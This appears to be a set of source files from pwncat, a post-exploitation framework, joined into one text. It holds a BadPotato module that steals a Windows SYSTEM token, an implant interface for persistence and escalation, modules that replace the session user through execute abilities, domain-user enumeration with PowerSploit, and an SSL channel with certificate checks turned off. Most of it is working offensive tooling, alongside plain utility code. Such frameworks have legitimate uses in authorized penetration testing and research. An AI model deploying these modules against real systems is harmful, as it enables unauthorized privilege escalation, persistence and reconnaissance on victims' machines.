#!/usr/bin/env python3

import pwncat
from pwncat.modules import Status, ModuleFailed
from pwncat.facts.windows import UserToken
from pwncat.platform.windows import Windows, ProtocolError
from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule


class Module(EnumerateModule):
    """Execute the BadPotato expoit to leak a SYSTEM user token"""

    PLATFORM = [Windows]
    SCHEDULE = Schedule.PER_USER
    SCOPE = Scope.SESSION
    PROVIDES = ["token", "ability.execute"]

    def enumerate(self, session: "pwncat.manager.Session"):

        # Non-admin users will crash the C2 if we try bad potato
        if not session.platform.is_admin():
            return

        try:
            # Load the badpotato plugin
            yield Status("loading badpotato c2 plugin...")
            badpotato = session.platform.dotnet_load("BadPotato.dll")

            # Grab a system token
            yield Status("triggering badpotato exploit...")
            token = badpotato.get_system_token()

            # Yield the new SYSTEM token
            yield UserToken(
                source=self.name,
                uid=session.find_user(name="NT AUTHORITY\\SYSTEM").id,
                token=token,
            )
        except ProtocolError as exc:
            raise ModuleFailed(f"failed to load badpotato: {exc}")



"""
Implant modules generate :class:`Implant` facts which provide the
ability to interact with the installed implant. Implants can be
one or more of spawn, replace or remote types. A spawn implant
is used to locally escalate privileges and spawns a new session.
A replace implant is also used to local escalation but instead
replaces the context of the current session with a different user.
Lastly, a remote implant allows pwncat to reconnect to the target.
"""
import enum
from typing import List, Union, Callable

import pwncat
from pwncat.db import Fact


class ImplantType(enum.Flag):
    """Type of implant which was installed"""

    SPAWN = enum.auto()
    """ Capable of spawning a new session to escalate privileges locally """
    REPLACE = enum.auto()
    """ Capable of replacing the current user context with the target user """
    REMOTE = enum.auto()
    """ Capable of reconnecting to the host later after disconnection """


class KeepImplantFact(Exception):
    """This is raised when removing an implant where the fact itself
    remains in the database, but the implant types are removed. Normally,
    this indicates that the implant was enumerated and not installed by
    pwncat. Removing the implant simply removes our ability to use it,
    but tracks the enumeration of the data."""


class Implant(Fact):
    """Abstract base implant class. Any fact which specifies an ``implant.*``
    type must implement this interface, however they are not required to
    inherit from this class (due to Python's duck typing). This is most
    notably utilized with :class:`pwncat.facts.PrivateKey` enumeration.

    :param source: generating module name
    :type source: str
    :param types: list of fact types
    :type types: List[str]
    :param uid: target UID
    :type uid: Union[int, str]
    """

    def __init__(self, source: str, types: List[str], uid: Union[int, str]):
        super().__init__(source=source, types=types)

        self.uid = uid

    def escalate(
        self, session: "pwncat.manager.Session"
    ) -> Union["pwncat.manager.Session", Callable[["pwncat.manager.Session"], None]]:
        """
        Escalate to the target user locally. If the implant type is ``implant.replace``, this
        method should replace the current user context with the target user and return a
        callable which can undo this action. The callable takes a session its' single argument.
        If the implant type is ``implant.spawn``, this method spawns a new session as the target
        user and returns the newly established session.

        :param session: the target session on which to act
        :type session: pwncat.manager.Session
        :rtype: Union[pwncat.manager.Session, Callable[[pwncat.manager.Session], None]]
        """
        raise NotImplementedError()

    def trigger(self, target: "pwncat.target.Target") -> "pwncat.manager.Session":
        """Trigger a remote implant and establish a new session. This is only valid for
        ``implant.remote`` implant types. It should return the newly established session.

        :param target: the database target object with the details on how to connect
        :type target: pwncat.target.Target
        :rtype: pwncat.manager.Session
        """

    def remove(self, session: "pwncat.manager.Session"):
        """Remove this implant from the target.

        :param session: the session on which to act
        :type session: pwncat.manager.Session
        """



#!/usr/bin/env python3

from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import EnumerateModule


class ASLRStateData(Fact):
    def __init__(self, source, state):
        super().__init__(source=source, types=["system.aslr"])

        self.state: int = state
        """ the value of /proc/sys/kernel/randomize_va_space """

    def title(self, session):
        if self.state == 0:
            return "[green]disabled[/green]"
        return "[red]enabled[/red]"


class Module(EnumerateModule):
    """
    Determine whether or not ASLR is enabled or disabled.
    :return:
    """

    PROVIDES = ["system.aslr"]
    PLATFORM = [Linux]

    def enumerate(self, session):

        try:
            with session.platform.open(
                "/proc/sys/kernel/randomize_va_space", "r"
            ) as filp:
                value = filp.read()
                try:
                    value = int(value)
                except ValueError:
                    value = None

            if value is not None:
                yield ASLRStateData(self.name, value)
        except (FileNotFoundError, PermissionError):
            pass



#!/usr/bin/env python3
import pwncat
from pwncat.commands import CommandDefinition


class Command(CommandDefinition):
    """
    Return to the remote terminal
    """

    PROG = "back"
    ARGS = {}

    def run(self, manager: "pwncat.manager.Manager", args):
        # This is caught by ``CommandParser.run`` which interprets
        # it as a `C-d` sequence, and returns to the remote prompt.
        raise EOFError



#!/usr/bin/env python3
import ssl

from pwncat.channel import ChannelError
from pwncat.channel.connect import Connect


class SSLConnect(Connect):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)

    def _socket_connected(self, client):
        try:
            self.context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            self.context.check_hostname = False
            self.context.verify_mode = ssl.VerifyMode.CERT_NONE

            client = self.context.wrap_socket(client)
        except ssl.SSLError as exc:
            raise ChannelError(self, str(exc))

        super()._socket_connected(client)



#!/usr/bin/env python3
import textwrap

import pwncat
import pwncat.modules
from pwncat.util import console
from pwncat.commands import Complete, Parameter, CommandDefinition, get_module_choices


class Command(CommandDefinition):
    """
    Run a module. If no module is specified, use the module in the
    current context. You can enter a module context with the `use`
    command.

    Module arguments can be appended to the run command with `variable=value`
    syntax. Arguments are type-checked prior to executing, and the results
    are displayed to the terminal.

    To locate available modules, you can use the `search` command. To
    find documentation on individual modules including expected
    arguments, you can use the `info` command.
    """

    PROG = "run"
    ARGS = {
        "--raw,-r": Parameter(
            Complete.NONE, action="store_true", help="Display raw results unformatted"
        ),
        "--traceback,-t": Parameter(
            Complete.NONE, action="store_true", help="Show traceback for module errors"
        ),
        "module": Parameter(
            Complete.CHOICES,
            nargs="?",
            metavar="MODULE",
            choices=get_module_choices,
            help="The module name to execute",
        ),
        "args": Parameter(Complete.NONE, nargs="*", help="Module arguments"),
    }

    def run(self, manager: "pwncat.manager.Manager", args):

        module_name = args.module

        if args.module is None and manager.config.module is None:
            console.log("[red]error[/red]: no module specified")
            return
        elif args.module is None:
            module_name = manager.config.module.name

        # Parse key=value pairs
        values = {}
        for arg in args.args:
            if "=" not in arg:
                values[arg] = True
            else:
                name, value = arg.split("=")
                values[name] = value

        # pwncat.config.locals.update(values)
        config_values = manager.config.locals.copy()
        config_values.update(values)

        try:
            result = manager.target.run(module_name, **config_values)

            if args.module is not None:
                manager.config.back()
        except pwncat.modules.ModuleFailed as exc:
            if args.traceback:
                console.print_exception()
            else:
                console.log(f"[red]error[/red]: module failed: {exc}")
            return
        except pwncat.modules.ModuleNotFound:
            console.log(f"[red]error[/red]: {module_name}: not found")
            return
        except pwncat.modules.ArgumentFormatError as exc:
            console.log(f"[red]error[/red]: {exc}: invalid argument")
            return
        except pwncat.modules.MissingArgument as exc:
            console.log(f"[red]error[/red]: missing argument: {exc}")
            return
        except pwncat.modules.InvalidArgument as exc:
            console.log(f"[red]error[/red]: invalid argument: {exc}")
            return

        if isinstance(result, list):
            result = [r for r in result if not r.hidden]
        elif result is not None and result.hidden:
            result = None

        if args.raw:
            console.print(result)
        else:

            if result is None or (isinstance(result, list) and not result):
                console.log(f"Module [bold]{module_name}[/bold] completed successfully")
                return

            if not isinstance(result, list):
                result = [result]
            self.display_item(manager, title=module_name, results=result)

    def display_item(self, manager, title, results):
        """Display a possibly complex item"""

        console.print(f"[bold underline]Module '{title}' Results[/bold underline]")

        # Uncategorized or raw results
        categories = {}
        uncategorized = []
        longform = []

        # Organize results by category
        for result in results:
            if isinstance(result, pwncat.modules.Result) and result.is_long_form(
                manager.target
            ):
                longform.append(result)
            elif (
                not isinstance(result, pwncat.modules.Result)
                or result.category(manager.target) is None
            ):
                uncategorized.append(result)
            elif result.category(manager.target) not in categories:
                categories[result.category(manager.target)] = [result]
            else:
                categories[result.category(manager.target)].append(result)

        # Show uncategorized results first
        if uncategorized:
            console.print("[bold]Uncategorized Results[/bold]")
            for result in uncategorized:
                console.print("- " + result.title(manager.target))

        # Show all other categories
        if categories:
            for category, results in categories.items():
                console.print(f"[bold]{category}[/bold]")
                for result in results:
                    console.print(f"  - {result.title(manager.target)}")

        # Show long-form results in their own sections
        if longform:
            for result in longform:
                if result.category(manager.target) is None:
                    console.print(f"[bold]{result.title(manager.target)}[/bold]")
                else:
                    console.print(
                        f"[bold]{result.category(manager.target)} - {result.title(manager.target)}[/bold]"
                    )
                console.print(textwrap.indent(result.description(manager.target), "  "))



"""
pwncat modules are the core extensible feature of pwncat. They provide a way for users to execute
complex scripted target interaction efficiently from the local prompt. The most extensive feature
is the enumeration modules allowing the user to quickly enumerate commonly useful information from
the target, and save the data in a database for future access.

There are standard modules implemented for enumerating arbitrary data, managing installed implants,
and generating formatted reports on your targets. Modules are loaded from within the pwncat package
by default, but can be loaded from other locations with the ``load`` command or the
:func:`pwncat.manager.Manager.load_modules` method. When loading custom modules, a path to a Python
package is given and any module within the package which defines a ``Module`` class that inherits
from :class:`pwncat.modules.BaseModule` will be imported and added to the module list.

For an up-to-date list of standard modules and their usage, please consult the internal pwncat
help/info documentation.

Example Module
--------------

.. code-block:: python
    :caption: Example Base Module

    class Module(BaseModule):
        \"\"\" Module Documentation \"\"\"

        PLATFORM = [Linux]
        ARGUMENTS = { "arg": Argument(str, help="help string") }

        def run(self, session: "pwncat.manager.Session", arg: str):
            yield Status("A status message!")
            session.log(f"ran {self.name}")

"""
import typing
import inspect
import functools
from typing import Any, Dict, Callable, Optional
from dataclasses import dataclass

import pwncat

LOADED_MODULES = {}


class NoValue:
    """Indicates that the module argument has no default value and is required."""


class ModuleFailed(Exception):
    """Base class for module failure"""


class ModuleNotFound(ModuleFailed):
    """The specified module was not found"""


class IncorrectPlatformError(ModuleFailed):
    """The requested module didn't match the current platform"""


class ArgumentFormatError(ModuleFailed):
    """Format of one of the arguments was incorrect"""


class MissingArgument(ModuleFailed):
    """A required argument is missing"""


class InvalidArgument(ModuleFailed):
    """This argument does not exist and ALLOW_KWARGS was false"""


@dataclass
class Argument:
    """Describes an individual module argument. Arguments to modules are
    always required. If an argument has the default :class:`NoValue` then
    the module will fail if no value is provided by the user."""

    type: Callable[[str], Any] = str
    """ A callable which converts a string to the required type
    This function should also return the passed value if it is
    already of that type. A :class:`ValueError` is raised if
    conversion is not possible. """
    default: Any = NoValue
    """ The default value for this argument. If set to :class:`NoValue`, the
    argument **must** be set by the user. """
    help: str = ""
    """ The help text displayed in the ``info`` output. """


def List(_type=str):
    """Argument list type, which accepts a list of the provided
    type. By default, this accepts a list of strings."""

    def _ListType(value):
        if isinstance(value, list):
            return [_type(item) for item in value]
        return [_type(item) for item in value.split(",")]

    _ListType.__repr__ = lambda self: f"List[{_type}]"

    return _ListType


def Bool(value: str):
    """Argument of type "bool". Accepts true/false (case-insensitive)
    as well as 1/0. The presence of an argument of type "Bool" with no
    assignment (e.g. ``run module arg``) is equivalent to ``run module arg=true``."""

    if isinstance(value, bool):
        return value

    if not isinstance(value, str):
        return bool(value)

    if value.lower() == "true" or value == "1":
        return True
    elif value.lower() == "false" or value == "0":
        return False

    raise ValueError(f"invalid boolean value: {value}")


class Result:
    """This class defines the interface for module results. Modules can
    yield or return results as needed, but each results must implement
    this interface. Inheriting from this class is enough to provide a
    suitable result, but it is recommended to override the :func:`title`
    method in order to provide a formatted title for your result. The
    :func:`category` method helps when organizing output with the ``run``
    command."""

    hidden: bool = False
    """ Hide results from automatic display with the ``run`` command """

    def category(self, session) -> str:
        """Return a "category" of object. Categories will be grouped.
        If this returns None or is not defined, this result will be "uncategorized"
        """
        return None

    def title(self, session) -> str:
        """Return a short-form description/title of the object. If not defined,
        this defaults to the object converted to a string."""
        return str(self)

    def description(self, session) -> str:
        """Returns a long-form description. If not defined, the result is assumed
        to not be a long-form result."""
        return None

    def is_long_form(self, session) -> bool:
        """Check if this is a long form result"""
        try:
            if self.description(session) is None:
                return False
        except NotImplementedError:
            return False
        return True


class Status(str):
    """A result which isn't actually returned, but simply updates
    the progress bar. It is equivalent to a string, so this is valid:
    ``yield Status("module status update")``"""

    def category(self, session) -> str:
        """Return a "category" of object. Categories will be grouped.
        If this returns None or is not defined, this result will be "uncategorized"
        """
        return None

    def title(self, session) -> str:
        """Return a short-form description/title of the object. If not defined,
        this defaults to the object converted to a string."""
        return str(self)

    def description(self, session) -> str:
        """Returns a long-form description. If not defined, the result is assumed
        to not be a long-form result."""
        return None

    def is_long_form(self, session) -> bool:
        """Check if this is a long form result"""
        try:
            if self.description(session) is None:
                return False
        except NotImplementedError:
            return False
        return True


def run_decorator(real_run):
    """Decorate a run function to evaluate types. This is an internal method.
    Every module's ``run`` method is decorated with this in order to first check
    arguments against the module definition and type-check/convert to the appropriate
    types. It is also responsible for creating the progress bar, collecting results
    and committing database changes."""

    @functools.wraps(real_run)
    def decorator(self, session, progress=None, **kwargs):

        # Validate arguments
        for key in kwargs:
            if key in self.ARGUMENTS:
                try:
                    kwargs[key] = self.ARGUMENTS[key].type(kwargs[key])
                except ValueError as exc:
                    raise ArgumentFormatError(key) from exc
            elif not self.ALLOW_KWARGS:
                raise InvalidArgument(key)
        for key in self.ARGUMENTS:
            if key not in kwargs and key in session.config:
                kwargs[key] = session.config[key]
            elif key not in kwargs and self.ARGUMENTS[key].default is not NoValue:
                kwargs[key] = self.ARGUMENTS[key].default
            elif key not in kwargs and self.ARGUMENTS[key].default is NoValue:
                raise MissingArgument(key)

        # Ensure that our database connection is up to date
        if session.module_depth == 0:
            # pwncat.console.log("incrementing mod counter")
            session.db.transaction_manager.begin()
        session.module_depth += 1
        old_show_progress = session.showing_progress
        if progress is not None:
            session.showing_progress = progress

        try:

            # Return the result
            result_object = real_run(self, session, **kwargs)

            if inspect.isgenerator(result_object):
                if session.showing_progress:
                    with session.task(description=self.name, status="...") as task:
                        # Collect results
                        results = []
                        for item in result_object:
                            session.update_task(task, status=item.title(session))
                            if not isinstance(item, Status):
                                results.append(item)
                else:
                    results = [
                        item for item in result_object if not isinstance(item, Status)
                    ]

                if self.COLLAPSE_RESULT and len(results) == 1:
                    return results[0]

                return results
            else:
                return result_object
        finally:
            session.module_depth -= 1
            session.showing_progress = old_show_progress

            if session.module_depth == 0:
                session.db.transaction_manager.commit()

    return decorator


class BaseModuleMeta(type):
    """This is a metaclass which is used to ensure the ``run`` method is decorated
    properly for all modules."""

    def __new__(cls, name, bases, local):
        if "run" in local:
            local["run"] = run_decorator(local["run"])
        return super().__new__(cls, name, bases, local)


class BaseModule(metaclass=BaseModuleMeta):
    """Generic module class. This class allows to easily create
    new modules. Any new module must inherit from this class. The
    run method is guaranteed to receive as key-word arguments any
    arguments specified in the ``ARGUMENTS`` dictionary.

    Results from the module are normally returned via the ``yield``
    instruction. This allows pwncat to collect results and provide
    status output. However, you can also return a single item with
    the ``return`` statement. The :func:`pwncat.manager.Session.run`
    method will by default normally return an array. If you module
    only has a single result, you can set the ``COLLAPSE_RESULT``
    property to ``True`` to tell pwncat to collapse a single-item
    array into a regular value.

    If your module should take arbitrary, unnamed keyword arguments,
    you can use set the ``ALLOW_KWARGS`` property, which allows the
    user to pass arbitrary key-value pairs to your module. These
    values will normally be strings, but it is the responsibility of
    the module to conduct type-checking.

    If the module is not platform-dependent, you can set the ``PLATFORM``
    property to ``None``.
    """

    ARGUMENTS: Dict[str, Argument] = {
        # "name": Argument(int, default="value"),
        # "name2": Argument(List(int), default=[1, 2, 3]),
    }
    """ Arguments which can be provided to the ``run`` method.
    This maps argument names to ``Argument`` instances describing
    the type, default value, and requirements for an individual
    argument.
    """
    ALLOW_KWARGS: bool = False
    """ Allow other kwargs parameters outside of what is specified by
    the arguments dictionary. This allows arbitrary arguments which
    are not type-checked to be passed. You should use `**kwargs` in
    your run method if this is set to True. """
    COLLAPSE_RESULT: bool = False
    """ If you want to use `yield Status(...)` to update the progress bar
    but only return one scalar value, setting this to true will collapse
    an array with only a single object to it's scalar value. """
    PLATFORM: typing.List[typing.Type["pwncat.platform.Platform"]] = []
    """ The platform this module is compatible with (can be multiple) """

    def __init__(self):
        self.progress = None
        # Filled in by reload
        self.name = None

    def run(
        self,
        session: "pwncat.manager.Session",
        progress: Optional[bool] = None,
        **kwargs,
    ):
        """The run method is called via keyword-arguments with all the
        parameters specified in the ``ARGUMENTS`` dictionary. If ``ALLOW_KWARGS``
        was True, then other keyword arguments may also be passed. Any
        types specified in ``ARGUMENTS`` will already have been checked.

        If there are any errors while processing a module, the module should
        raise ``ModuleError`` or a subclass in order to enable ``pwncat`` to
        automatically and gracefully handle a failed module execution.

        If ``progress`` is None, the visibility of progress information
        will be inherited from the parent module. If this module was run
        directly by the framework, the default is to display progress
        information. If ``progress`` is False, no progress information
        will be displayed and any subsequent modules which set progress
        to None will not display progress information.

        :param session: the active session
        :type session: pwncat.manager.Session
        :param progress: whether to show progress information for this and subsequent modules
        :type progress: Optional[bool]
        """

        raise NotImplementedError



#!/usr/bin/env python3

import pwncat
from pwncat.facts import ExecuteAbility, EscalationReplace
from pwncat.modules.enumerate import Schedule, EnumerateModule


class DirectReplaceAbility(EscalationReplace):
    def __init__(self, source, ability: ExecuteAbility):
        super().__init__(source, ability.source_uid, ability.uid)

        self.ability: ExecuteAbility = ability

    def escalate(self, session: "pwncat.manager.Session"):

        return self.ability.shell(session)

    def title(self, session: "pwncat.manager.Session"):
        return self.ability.title(session)


class Module(EnumerateModule):
    """Locate execute abilities and produce escalation methods from them.
    This module produces EscalationReplace results which replace the active
    user in the running session with the new user."""

    PLATFORM = None
    SCHEDULE = Schedule.ALWAYS
    PROVIDES = ["escalate.replace"]

    def enumerate(self, session: "pwncat.manager.Session"):

        for ability in session.run("enumerate", types=["ability.execute"]):
            yield DirectReplaceAbility(self.name, ability)



"""
Various utility methods and classes which don't fit in any other modules or packages.
"""
import os
import re
import sys
import tty
import fcntl
import random
import string
import termios
from io import TextIOWrapper
from enum import Enum, Flag, auto
from typing import List, Optional

import netifaces
from rich import markup
from rich.console import Console

console = Console(emoji=False)

CTRL_C = b"\x03"

ALPHANUMERIC = string.ascii_letters + string.digits

STORED_TERM_STATE = []


class State(Enum):
    """The current PtyHandler state"""

    NORMAL = auto()
    RAW = auto()
    COMMAND = auto()
    SINGLE = auto()


class Access(Flag):
    """Check if you are able to read/write/execute a file"""

    NONE = 0
    EXISTS = auto()
    READ = auto()
    WRITE = auto()
    EXECUTE = auto()
    SUID = auto()
    SGID = auto()
    REGULAR = auto()
    DIRECTORY = auto()
    # These identify if the parent directory exists and is
    # writable. This is useful to test whether we can create
    # the file if it doesn't exist
    PARENT_EXIST = auto()
    PARENT_WRITE = auto()


class Init(Enum):

    UNKNOWN = auto()
    SYSTEMD = auto()
    UPSTART = auto()
    SYSV = auto()


class CommandSystemExit(Exception):
    """A command has requested that we exit pwncat (mostly used for exit command)"""


class CompilationError(Exception):
    """
    Indicates that compilation failed on either the local or remote host.

    :param source_error: indicates whether there was a compilation error due to source
        code syntax. If not, this was due to a missing compiler.
    """

    def __init__(
        self, source_error: bool, stdout: Optional[str], stderr: Optional[str]
    ):
        self.source_error = source_error
        self.stdout = stdout
        self.stderr = stderr

    def __str__(self):
        """
        Provide a easy output depending on the reason for the failure.
        :return: str
        """
        if self.source_error:
            return "No working local or remote compiler found"
        else:
            return "Error during compilation of source files"


class RawModeExit(Exception):
    """Indicates that the user would like to exit the raw mode
    shell. This is normally raised when the user presses the
    <prefix>+<C-d> key combination to return to the local prompt."""


def strip_markup(styled_text: str) -> str:
    """Strip rich markup from text"""
    text = markup.render(styled_text)
    return text.plain


def isprintable(data) -> bool:
    """
    This is a convenience function to be used rather than the usual
    ``str.printable`` boolean value, as that built-in **DOES NOT** consider
    newlines to be part of the printable data set (weird!)
    """

    if type(data) is str:
        data = data.encode("utf-8")
    return all(c in bytes(string.printable, "ascii") for c in data)


def human_readable_size(size, decimal_places=2):
    for unit in ["B", "KiB", "MiB", "GiB", "TiB"]:
        if size < 1000.0:
            return f"{size:.{decimal_places}f}{unit}"
        size /= 1000.0
    return f"{size:.{decimal_places}f}{unit}"


def human_readable_delta(seconds):
    """This produces a human-readable time-delta output suitable for output to
    the terminal. It assumes that "seconds" is less than 1 day. I.e. it will only
    display at most, hours minutes and seconds."""

    if seconds < 60:
        return f"{seconds:.2f} seconds"

    output = [f"{int(seconds % 60)} seconds"]
    minutes = seconds // 60
    output.append(f"{minutes % 60} minutes")

    if minutes < 60:
        return f"{output[1]} and {output[0]}"

    hours = minutes // 60
    output.append(f"{hours} hours")

    return f"{output[2]}, {output[1]} and {output[0]}"


def join(argv: List[str]):
    """Join the string much line shlex.join, except assume that each token
    is expecting double quotes. This allows variable references within the
    tokens."""

    return " ".join([quote(x) for x in argv])


def quote(token: str):
    """Quote the token much like shlex.quote, except don't use single quotes
    this will escape any double quotes in the string and wrap it in double
    quotes. If there are no spaces, it returns the string unchanged."""
    for c in token:
        if c in string.whitespace:
            break
    else:
        return token

    return '"' + token.replace('"', '\\"') + '"'


ansi_escape_pattern = re.compile(r"\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])")


def strip_ansi_escape(s: str) -> str:
    """
    Strip the ansi escape sequences out of the given string
    :param s: the string to strip
    :return: a version of 's' without ansi escape sequences
    """
    return ansi_escape_pattern.sub("", s)


def escape_markdown(s: str) -> str:
    """
    Escape any markdown special characters
    :param s:
    :return:
    """
    return re.sub(r"""([\\`*_}{\[\]()#+!])""", r"\\\1", s)


def copyfileobj(src, dst, callback, nomv=False):
    """Copy a file object to another file object with a callback.
    This method assumes that both files are binary and support readinto
    """

    try:
        length = os.stat(src.fileno()).st_size
        length = min(length, 1024 * 1024)
    except (OSError, AttributeError):
        length = 1024 * 1024

    copied = 0

    if getattr(src, "readinto", None) is None or nomv:
        for chunk in iter(lambda: src.read(length), b""):
            dst.write(chunk)
            copied += len(chunk)
            callback(len(chunk))
    else:
        with memoryview(bytearray(length)) as mv:
            while True:
                n = src.readinto(mv)
                if not n:
                    break
                if n < length:
                    with mv[:n] as smv:
                        dst.write(smv)
                else:
                    dst.write(mv)
                copied += n
                callback(n)


def random_string(length: int = 8):
    """Create a random alphanumeric string"""
    return random.choice(string.ascii_letters) + "".join(
        random.choice(ALPHANUMERIC) for _ in range(length - 1)
    )


def enter_raw_mode(non_block=True):
    """Set stdin/stdout to raw mode to pass data directly.

    returns: the old state of the terminal
    """

    # Ensure we don't have any weird buffering issues
    sys.stdout.flush()

    # Python doesn't provide a way to use setvbuf, so we reopen stdout
    # and specify no buffering. Duplicating stdin allows the user to press C-d
    # at the local prompt, and still be able to return to the remote prompt.
    try:
        os.dup2(sys.stdin.fileno(), sys.stdout.fileno())
    except OSError:
        pass
    sys.stdout = TextIOWrapper(
        os.fdopen(os.dup(sys.stdin.fileno()), "bw", buffering=0),
        write_through=True,
        line_buffering=False,
    )

    # Grab and duplicate current attributes
    fild = sys.stdin.fileno()
    old = termios.tcgetattr(fild)
    new = termios.tcgetattr(fild)

    # Remove ECHO from lflag and ensure we won't block
    new[3] &= ~(termios.ECHO | termios.ICANON)

    if non_block:
        new[6][termios.VMIN] = 0
        new[6][termios.VTIME] = 0

    termios.tcsetattr(fild, termios.TCSADRAIN, new)

    # Set raw mode
    tty.setraw(sys.stdin)

    orig_fl = fcntl.fcntl(sys.stdin, fcntl.F_GETFL)
    fcntl.fcntl(sys.stdin, fcntl.F_SETFL, orig_fl)

    return old, orig_fl


def push_term_state():
    """Save the current terminal state on our state stack
    so we can easily return to the current state."""

    # We save the termios settings and flags
    STORED_TERM_STATE.append(
        (
            sys.stdin,
            termios.tcgetattr(sys.stdin.fileno()),
            fcntl.fcntl(sys.stdin, fcntl.F_GETFL),
        )
    )


def pop_term_state():
    """
    Return the terminal to the state that was last pushed
    """

    try:
        state = STORED_TERM_STATE.pop()
        restore_terminal(state[1:])
    except IndexError:
        pass


def restore_terminal(state, new_line=True):
    """restore the stdio state from the result of "enter_raw_mode" """
    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, state[0])
    # tty.setcbreak(sys.stdin)
    fcntl.fcntl(sys.stdin, fcntl.F_SETFL, state[1])
    if new_line:
        sys.stdout.write("\n")


def get_ip_addr() -> str:
    """Retrieve the current IP address. This will return the first tun/tap
    interface if availabe. Otherwise, it will return the first "normal"
    interface with no preference for wired/wireless."""

    PROTO = netifaces.AF_INET
    ifaces = [
        iface
        for iface in netifaces.interfaces()
        if not iface.startswith("virbr")
        and not iface.startswith("lo")
        and not iface.startswith("docker")
    ]

    # look for a tun/tap interface
    for iface in ifaces:
        if iface.startswith("tun") or iface.startswith("tap"):
            addrs = netifaces.ifaddresses(iface)
            if PROTO not in addrs:
                continue
            for a in addrs[PROTO]:
                if "addr" in a:
                    return a["addr"]

    # Try again. We don't care what kind now
    for iface in ifaces:
        addrs = netifaces.ifaddresses(iface)
        if PROTO not in addrs:
            continue
        for a in addrs[PROTO]:
            if "addr" in a:
                return a["addr"]

    return None



#!/usr/bin/env python3
from typing import Dict, Optional
from datetime import datetime

import pwncat
from pwncat.modules import Status
from pwncat.facts.windows import WindowsUser
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class DomainUser(WindowsUser):
    """Builds on Windows Groups to add domain specific information"""

    def __init__(
        self,
        source: str,
        name: str,
        uid: str,
        account_expires: Optional[datetime],
        description: str,
        enabled: bool,
        full_name: str,
        password_changeable_date: Optional[datetime],
        password_expires: Optional[datetime],
        user_may_change_password: bool,
        password_required: bool,
        password_last_set: Optional[datetime],
        last_logon: Optional[datetime],
        principal_source: str,
        domain: str,
        data: Dict,
        password: Optional[str] = None,
        hash: Optional[str] = None,
    ):
        super().__init__(
            source=source,
            name=name,
            uid=uid,
            account_expires=account_expires,
            description=description,
            enabled=enabled,
            full_name=full_name,
            password_changeable_date=password_changeable_date,
            password_expires=password_expires,
            user_may_change_password=user_may_change_password,
            password_required=password_required,
            password_last_set=password_last_set,
            last_logon=last_logon,
            principal_source=principal_source,
            password=password,
            hash=hash,
        )

        self.types.append("domain.user")

        self.domain = domain

        if "description" in data:
            data["user_description"] = data.get("description")
            del data["description"]

        self.__dict__.update(data)

    def __repr__(self):
        if self.password is None and self.hash is None:
            return f"""DomainUser(uid={self.id}, name={repr(self.name)}, domain={repr(self.domain)})"""
        elif self.password is not None:
            return f"""DomainUser(uid={repr(self.id)}, name={repr(self.name)}, domain={repr(self.domain)}, password={repr(self.password)})"""
        else:
            return f"""DomainUser(uid={repr(self.id)}, name={repr(self.name)}, domain={repr(self.domain)}, hash={repr(self.hash)})"""


class Module(EnumerateModule):
    """Retrieve information on all domain computers"""

    PLATFORM = [Windows]
    PROVIDES = ["domain.user", "user"]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Perform enumeration"""

        # Check that we are in a domain
        if not session.run("enumerate", types=["domain.details"]):
            return

        # Ensure we have PowerView loaded
        yield Status("loading powersploit recon")
        session.run("powersploit", group="recon")

        try:
            domain = session.run("enumerate.domain")[0]
        except IndexError:
            # Not a domain joined machine
            return

        try:
            yield Status("requesting domain groups")
            users = session.platform.powershell("Get-DomainUser")[0]
        except (IndexError, PowershellError):
            # Doesn't appear to be a domain joined user
            return

        if isinstance(users, dict):
            users = [users]

        for user in users:
            yield DomainUser(
                source=self.name,
                name=user["samaccountname"],
                uid=user["objectsid"],
                account_expires=user.get("accountexpires"),
                description=user.get("description") or "",
                enabled=True,
                full_name=user.get("name") or "",
                password_changeable_date=None,
                password_expires=None,
                user_may_change_password=True,
                password_required=True,
                password_last_set=None,
                last_logon=None,
                principal_source="",
                domain=domain["Name"],
                data=user,
            )
